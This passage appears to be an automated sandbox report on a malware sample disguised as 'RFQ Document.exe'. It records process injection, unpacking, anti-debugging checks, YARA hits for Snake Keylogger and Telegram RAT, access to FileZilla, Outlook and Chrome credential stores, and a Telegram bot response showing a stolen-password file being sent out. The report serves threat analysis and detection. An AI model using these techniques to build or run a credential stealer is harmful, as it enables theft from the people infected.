Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059756DA	2_2_059756DA
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059726C2	2_2_059726C2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05979E08	2_2_05979E08
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05974E28	2_2_05974E28
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597E990	2_2_0597E990
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597E9A0	2_2_0597E9A0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059749CF	2_2_059749CF
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059771E7	2_2_059771E7
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05979168	2_2_05979168
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059708F0	2_2_059708F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059740F8	2_2_059740F8
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059708E0	2_2_059708E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05970006	2_2_05970006
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597783A	2_2_0597783A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0597384A	2_2_0597384A
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059733F0	2_2_059733F0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_059763E0	2_2_059763E0
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05978B18	2_2_05978B18
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_05975B30	2_2_05975B30

Source: RFQ Document.exe, 00000001.00000003.662485208.000000000E936000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs RFQ Document.exe
Source: RFQ Document.exe, 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs RFQ Document.exe
Source: RFQ Document.exe	Binary or memory string: OriginalFilename vs RFQ Document.exe
Source: RFQ Document.exe, 00000002.00000002.925878949.0000000000197000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ Document.exe
Source: RFQ Document.exe, 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs RFQ Document.exe

Source: RFQ Document.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\RFQ Document.exe

File read: C:\Users\user\Desktop\RFQ Document.exe

Jump to behavior

Source: RFQ Document.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\RFQ Document.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
Source: C:\Users\user\Desktop\RFQ Document.exe	Process created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'
Source: C:\Users\user\Desktop\RFQ Document.exe	Process created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'	Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

File created: C:\Users\user\AppData\Local\Temp\nsk2EC6.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/2@5/3

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 1_2_00402053 CoCreateInstance,MultiByteToWideChar,

1_2_00402053

Source: C:\Users\user\Desktop\RFQ Document.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 1_2_004042C1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_004042C1

Source: C:\Users\user\Desktop\RFQ Document.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,

2_2_00401489

Source: RFQ Document.exe

String found in binary or memory: F-Stopw

Source: 2.2.RFQ Document.exe.4940000.5.unpack, ???mufffd/ufffd???R.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
Source: 2.2.RFQ Document.exe.4940000.5.unpack, ufffdufffd??ufffd/ufffdu0609ufffd?m.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\RFQ Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: wntdll.pdbUGP source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: RFQ Document.exe, 00000001.00000003.668676239.000000000E820000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Unpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Unpacked PE file: 2.2.RFQ Document.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.gfids:R;.rsrc:R;

Detected unpacking (creates a PE file in dynamic memory)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Unpacked PE file: 2.2.RFQ Document.exe.4940000.5.unpack

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00401F16 push ecx; ret	2_2_00401F29
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594FD90 pushfd ; ret	2_2_0594FD92
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0594FE19 pushfd ; ret	2_2_0594FE1A

Source: C:\Users\user\Desktop\RFQ Document.exe

File created: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll

Jump to dropped file

Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00405EC2 FindFirstFileA,FindClose,	1_2_00405EC2
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_004054EC
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_00402671 FindFirstFileA,	1_2_00402671
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00404A29 FindFirstFileExW,	2_2_00404A29

Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	Binary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user \| Snake Keylogger\n\nPW \| user \| Snake"}}
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	Binary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user \| Snake Keylogger\n\nPW \| user \| Snake"}}d
Source: RFQ Document.exe, 00000002.00000002.929213067.0000000005FCB000.00000004.00000001.sdmp	Binary or memory string: {"ok":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user \| Snake Keylogger\n\nPW \| user \| Snake"}}
Source: RFQ Document.exe, 00000002.00000002.926716037.00000000024F7000.00000004.00000001.sdmp	Binary or memory string: k":true,"result":{"message_id":12828,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808777,"document":{"file_name":"SnakePW.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAIyHGFSr0k04FSKMz2uOWGp3zHXGj4OAALpDAACxkKRUr9jsMmoR-bZIQQ","file_unique_id":"AgAD6QwAAsZCkVI","file_size":195},"caption":"Pc Name: user \| Snake Keylogger\n\nPW \| user \| Snake"}}j
Source: RFQ Document.exe, 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_0040446F

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_004067FE GetProcessHeap,

2_2_004067FE

Source: C:\Users\user\Desktop\RFQ Document.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8B472 mov eax, dword ptr fs:[00000030h]	1_2_6FD8B472
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8B7B4 mov eax, dword ptr fs:[00000030h]	1_2_6FD8B7B4
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8B776 mov eax, dword ptr fs:[00000030h]	1_2_6FD8B776
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8B737 mov eax, dword ptr fs:[00000030h]	1_2_6FD8B737
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 1_2_6FD8B686 mov eax, dword ptr fs:[00000030h]	1_2_6FD8B686
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_004035F1 mov eax, dword ptr fs:[00000030h]	2_2_004035F1

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_0234C1D7 LdrInitializeThunk,

2_2_0234C1D7

Source: C:\Users\user\Desktop\RFQ Document.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00401E1D SetUnhandledExceptionFilter,	2_2_00401E1D
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040446F
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00401C88
Source: C:\Users\user\Desktop\RFQ Document.exe	Code function: 2_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00401F30

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: 2.2.RFQ Document.exe.4940000.5.unpack, ufffdufffd??ufffd/ufffdu0609ufffd?m.cs	Reference to suspicious API methods: ('R????', 'MapVirtualKey@user32.dll')
Source: 2.2.RFQ Document.exe.4940000.5.unpack, ?????/ufffdud9d8udc81iu26ca.cs	Reference to suspicious API methods: ('c?Z??', 'LoadLibrary@kernel32.dll'), ('i???;', 'GetProcAddress@kernel32')

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Memory written: C:\Users\user\Desktop\RFQ Document.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Process created: C:\Users\user\Desktop\RFQ Document.exe 'C:\Users\user\Desktop\RFQ Document.exe'

Jump to behavior

Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: RFQ Document.exe, 00000002.00000002.926341642.0000000000E10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\RFQ Document.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\RFQ Document.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_0040208D cpuid

2_2_0040208D

Source: C:\Users\user\Desktop\RFQ Document.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\RFQ Document.exe

Code function: 2_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_00401B74

Source: C:\Users\user\Desktop\RFQ Document.exe

1_2_0040312A

Stealing of Sensitive Information:

Yara detected Snake Keylogger

Show sources

Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY

Yara detected Telegram RAT

Show sources

Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.415058.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000001.671831085.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926087127.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926695160.00000000024D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.674264323.000000000E7D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.926522731.00000000022F0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.928008306.0000000004942000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.927923134.0000000003461000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ Document.exe PID: 2628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RFQ Document.exe PID: 6484, type: MEMORYSTR

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\RFQ Document.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.22f0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.4940000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.7b49c8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RFQ Document.exe.e7e1458.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.RFQ Document.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.3465530.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RFQ Document.exe.400000.1.raw.unpack, type: UNPACKEDPE
